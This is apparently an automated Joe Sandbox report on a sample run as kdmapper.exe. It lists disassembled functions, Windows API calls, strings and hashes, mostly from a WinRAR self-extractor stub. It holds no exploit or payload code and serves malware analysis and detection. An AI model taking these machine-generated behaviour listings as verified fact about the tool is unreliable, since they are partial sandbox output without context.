Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
String ID:
API String ID: 2759974054-0
Opcode ID: d4b4f765204421fc5023d21932fe76617ef4cf60d1a6fa8fef69ac652b5a7f36
Instruction ID: 2de89cd2b15eec1c042bf259836c254b467cc04522ef885a4e32e4fa4c4f0624
Opcode Fuzzy Hash: d4b4f765204421fc5023d21932fe76617ef4cf60d1a6fa8fef69ac652b5a7f36
Instruction Fuzzy Hash: 3121363691AA83B1EB55BF10D9D42B8A3A5FF54FC4F894036CE5D8B254DF2C9881A370

Function 00007FF735DD1400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF735DD140B
__std_exception_copy.VCRUNTIME140 ref: 00007FF735DD1444

Strings

string too long, xrefs: 00007FF735DD1404

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Xlength_error@std@@__std_exception_copy
String ID: string too long
API String ID: 127952674-2556327735
Opcode ID: 89d7d8f452b379fe6b6802d6f556719cdd5f33c5e524f226374701c1ed2583e1
Instruction ID: 1fb6340fa2c6a233aec9be385d86828d35c948abc7d61de7e939b10c4a904df8
Opcode Fuzzy Hash: 89d7d8f452b379fe6b6802d6f556719cdd5f33c5e524f226374701c1ed2583e1
Instruction Fuzzy Hash: C7E0E561A54B46E1EF05AF61E8900A8B375EB58F54BC49131C95D4A324EF3CE2E9D314

Function 00007FF735DB9C40 Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9CFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9D67
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9FFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBA020

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: b3eb811457c7a1482b9a2b945b6ffa28c0ffbb9270caf0cd92ca5b9d91cc925a
Instruction ID: 6e3e3087151825f114a937b47ef8e35992964d51ca0cdea15c1f9932b13118b4
Opcode Fuzzy Hash: b3eb811457c7a1482b9a2b945b6ffa28c0ffbb9270caf0cd92ca5b9d91cc925a
Instruction Fuzzy Hash: 2FB1E722E24BC5A6E711DB35948427EF7B4FF99B84F048332EE8652664DB3CE442D710

Function 00007FF735DB34D0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF735DA83EF), ref: 00007FF735DB354F
memmove.VCRUNTIME140(?,?,?,00007FF735DA83EF), ref: 00007FF735DB356B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF735DA83EF), ref: 00007FF735DB358B
memmove.VCRUNTIME140(?,?,?,00007FF735DA83EF), ref: 00007FF735DB35B9

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$freemalloc
String ID:
API String ID: 1763039611-0
Opcode ID: 4612718c5eb21b574697e27893dc7b7a5a698bd1bfdf0afee39cc7be2cde016e
Instruction ID: 55d5fd5dce59188614ebb716657aed120d569edde7fa387d641b404531fa23db
Opcode Fuzzy Hash: 4612718c5eb21b574697e27893dc7b7a5a698bd1bfdf0afee39cc7be2cde016e
Instruction Fuzzy Hash: EC31D472715A82A6EE18DF09E5801A8A3A1FB48F81B888436DF5D87B51DF3CE591D700

Analysis Process: kdmapper.exePID: 1452, Parent PID: 3804COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	1468
Total number of Limit Nodes:	45

Executed Functions

Function 00DFDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DF0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00DF087C
Part of subcall function 00DF0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DF088E
Part of subcall function 00DF0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DF08BF

Part of subcall function 00DFA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DFA655

Part of subcall function 00DFAC16: OleInitialize.OLE32(00000000), ref: 00DFAC2F
Part of subcall function 00DFAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DFAC66
Part of subcall function 00DFAC16: SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70

GetCommandLineW.KERNEL32 ref: 00DFDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DFDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00DFDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00DFDFCE

Part of subcall function 00DFDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DFDBF4
Part of subcall function 00DFDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DFDC30

CloseHandle.KERNEL32(00000000), ref: 00DFDFD7
GetModuleFileNameW.KERNEL32(00000000,00E3EC90,00000800), ref: 00DFDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00E3EC90), ref: 00DFDFFE
GetLocalTime.KERNEL32(?), ref: 00DFE009
_swprintf.LIBCMT ref: 00DFE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DFE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00DFE061
LoadIconW.USER32(00000000,00000064), ref: 00DFE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00DFE0C9
Sleep.KERNEL32(?), ref: 00DFE0F7
DeleteObject.GDI32 ref: 00DFE130
DeleteObject.GDI32(?), ref: 00DFE140
CloseHandle.KERNEL32 ref: 00DFE183

Strings

xz, xrefs: 00DFE10B
winrarsfxmappingfile.tmp, xrefs: 00DFDF77
sfxname, xrefs: 00DFDFF9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00DFE039
C:\Users\user\Desktop, xrefs: 00DFDF33
STARTDLG, xrefs: 00DFE0BE
sfxstime, xrefs: 00DFE055

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
API String ID: 3049964643-1042931266
Opcode ID: 75f201f272fd8f44173124bbe9267f9087da5cc25eb784e69470d65f3691c065
Instruction ID: 87ccb68cb25ff7ae8b5b7c721df1a3ef9cc8825e76d968bc76618ee9f2753ec3
Opcode Fuzzy Hash: 75f201f272fd8f44173124bbe9267f9087da5cc25eb784e69470d65f3691c065
Instruction Fuzzy Hash: 2561C371904388AFD320AF76EC49F7B7BA9EF49700F058429FA45B22A1DA749948C771

Function 00DFA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6EC
LoadResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA703
LockResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DFB73D,00000066), ref: 00DFA72D
GlobalLock.KERNEL32(00000000), ref: 00DFA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
GlobalUnlock.KERNEL32(00000000), ref: 00DFA7C6

Part of subcall function 00DFA626: GdipAlloc.GDIPLUS(00000010), ref: 00DFA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DFA7A7
GlobalFree.KERNEL32(00000000), ref: 00DFA7CD

Strings

PNG, xrefs: 00DFA6C6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: e7dc6f3bc5f04e709de03bf61a1ac3b297384a67997ce787ea61dcb753576511
Instruction ID: e349556f631e5cfc28635ffa36f6535604bc8e12a63b23dc40eb0f4ca36182c9
Opcode Fuzzy Hash: e7dc6f3bc5f04e709de03bf61a1ac3b297384a67997ce787ea61dcb753576511
Instruction Fuzzy Hash: 3631D5B5601306BFC710AF36DC48D6BBFB9EF84760B058529F909A2260EB31DD48CA71

Function 00DEA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6C4

Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA728
GetLastError.KERNEL32(?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA734

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: d3f722a0bb72b68dce2c372736627a83ecfeb12eb36ceb3410201596956eb12d
Instruction ID: d3a4f651df838d15c258a79cb02229efc3e3e92c5290c387a3c5a99908d4c78a
Opcode Fuzzy Hash: d3f722a0bb72b68dce2c372736627a83ecfeb12eb36ceb3410201596956eb12d
Instruction Fuzzy Hash: 9441717650055AABCB25EF69CC84AEDB7B8FB48350F144196E569E3200D734AE94CFA0

Function 00E07DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002,00000000), ref: 00E07E0F
TerminateProcess.KERNEL32(00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002,00000000), ref: 00E07E16
ExitProcess.KERNEL32 ref: 00E07E28

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 500340890a7e0abcaace455d8e77e85a64a693f486aefde2dc0f2f814503c7e2
Instruction ID: 49a61a3f8041b19b00dabe213cbec6c79c97a09dce64d8680641990c65dd7e28
Opcode Fuzzy Hash: 500340890a7e0abcaace455d8e77e85a64a693f486aefde2dc0f2f814503c7e2
Instruction Fuzzy Hash: 73E08631441144EFCF016F21CD099893FAAEF04341F008458F849BB172CB36EE96CB90

Function 00DE848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE8493

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b6e06cb06840a69392cb797dbf089810378346b50292151f0198a77709fa8696
Instruction ID: 31ab248d924ffa957755134ef82008273abdf85df2200d34dd2e643c19524aa9
Opcode Fuzzy Hash: b6e06cb06840a69392cb797dbf089810378346b50292151f0198a77709fa8696
Instruction Fuzzy Hash: A382F9709042C5AEDF15EF65C891BFABBB9AF15300F0C41B9E84D9B182DB315A88DB70

Function 00DFB7E0 Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DFB7E5

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB8EF
IsDialogMessageW.USER32(?,?), ref: 00DFB902
TranslateMessage.USER32(?), ref: 00DFB910
DispatchMessageW.USER32(?), ref: 00DFB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DFB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DFB960
GetDlgItem.USER32(?,00000068), ref: 00DFB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFB99E
SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFB9B1

Part of subcall function 00DFD453: _wcschr.LIBVCRUNTIME ref: 00DFD45C
Part of subcall function 00DFD453: _wcslen.LIBCMT ref: 00DFD47D

SetFocus.USER32(00000000), ref: 00DFB9B8
_swprintf.LIBCMT ref: 00DFBA24

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

Part of subcall function 00DFD4D4: GetDlgItem.USER32(00000068,00E3FCB8), ref: 00DFD4E8
Part of subcall function 00DFD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00DFAF07,00000001,?,?,00DFB7B9,00E1506C,00E3FCB8,00E3FCB8,00001000,00000000,00000000), ref: 00DFD510
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00DFBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00DFBA90
GetTickCount.KERNEL32 ref: 00DFBAAE
_swprintf.LIBCMT ref: 00DFBAC2
GetLastError.KERNEL32(?,00000011), ref: 00DFBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00DFBB43
_swprintf.LIBCMT ref: 00DFBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00DFBBD0
GetCommandLineW.KERNEL32 ref: 00DFBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00DFBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00DFBC6F
Sleep.KERNEL32(00000064), ref: 00DFBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00DFBCE2
CloseHandle.KERNEL32(00000000), ref: 00DFBCEB
_swprintf.LIBCMT ref: 00DFBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBD7D
SetDlgItemTextW.USER32(?,00000065,00E135F4), ref: 00DFBD94
GetDlgItem.USER32(?,00000065), ref: 00DFBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00DFBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DFBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBE68
_wcslen.LIBCMT ref: 00DFBEBE
_swprintf.LIBCMT ref: 00DFBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DFBF4C
GetDlgItem.USER32(?,00000068), ref: 00DFBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DFBF6B
GetDlgItem.USER32(?,00000066), ref: 00DFBF85
SetWindowTextW.USER32(00000000,00E2A472), ref: 00DFBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DFC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00DFC0BD
EnableWindow.USER32(00000000,00000000), ref: 00DFC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DFC1D9

Part of subcall function 00DFC73F: __EH_prolog.LIBCMT ref: 00DFC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC1FD

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00DFBB6B
winrarsfxmappingfile.tmp, xrefs: 00DFBBA6
%s, xrefs: 00DFBED8
__tmp_rar_sfx_access_check_%u, xrefs: 00DFBAB5
<, xrefs: 00DFBB84
@, xrefs: 00DFBB91
C:\Users\user\Desktop, xrefs: 00DFBBC9
LICENSEDLG, xrefs: 00DFC0B2
"%s"%s, xrefs: 00DFBD0D
STARTDLG, xrefs: 00DFB801
Q, xrefs: 00DFBBBC

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$Q
API String ID: 3829768659-3052343351
Opcode ID: bb6e8f2cee889ff339ac28bd5dd1ddeb42ae7b1516ae480149e28995e6e772d2
Instruction ID: 7e3b78bb738f0f984e2efdbeadb5648c1b8c05611ff3328d76c0b7daa73be21f
Opcode Fuzzy Hash: bb6e8f2cee889ff339ac28bd5dd1ddeb42ae7b1516ae480149e28995e6e772d2
Instruction Fuzzy Hash: 6B42E47094028CBEEB21AB71DD4AFBE7B6CAB11700F098156F744B61D2CB749A49CB31

Function 00DF0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00DF087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DF088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DF08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DF0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF0B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00DF0BB1
CloseHandle.KERNEL32(00000000), ref: 00DF0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DF0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00DF0C72
GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00DF0C9C
GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00DF0CD8

Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858

_swprintf.LIBCMT ref: 00DF0D4A
_swprintf.LIBCMT ref: 00DF0D96

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

AllocConsole.KERNEL32 ref: 00DF0D9E
GetCurrentProcessId.KERNEL32 ref: 00DF0DA8
AttachConsole.KERNEL32(00000000), ref: 00DF0DAF
_wcslen.LIBCMT ref: 00DF0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00DF0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00DF0DDC
Sleep.KERNEL32(00002710), ref: 00DF0DE7
FreeConsole.KERNEL32 ref: 00DF0DED
ExitProcess.KERNEL32 ref: 00DF0DF5

Strings

Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00DF0D84
dwmapi.dll, xrefs: 00DF0927, 00DF0D0D
<, xrefs: 00DF0917
SetDefaultDllDirectories, xrefs: 00DF08B9
d?, xrefs: 00DF09FE
0?, xrefs: 00DF09E8
4B, xrefs: 00DF0B3D
h=, xrefs: 00DF0947
8>, xrefs: 00DF098F
uxtheme.dll, xrefs: 00DF0D17
|?, xrefs: 00DF0A09
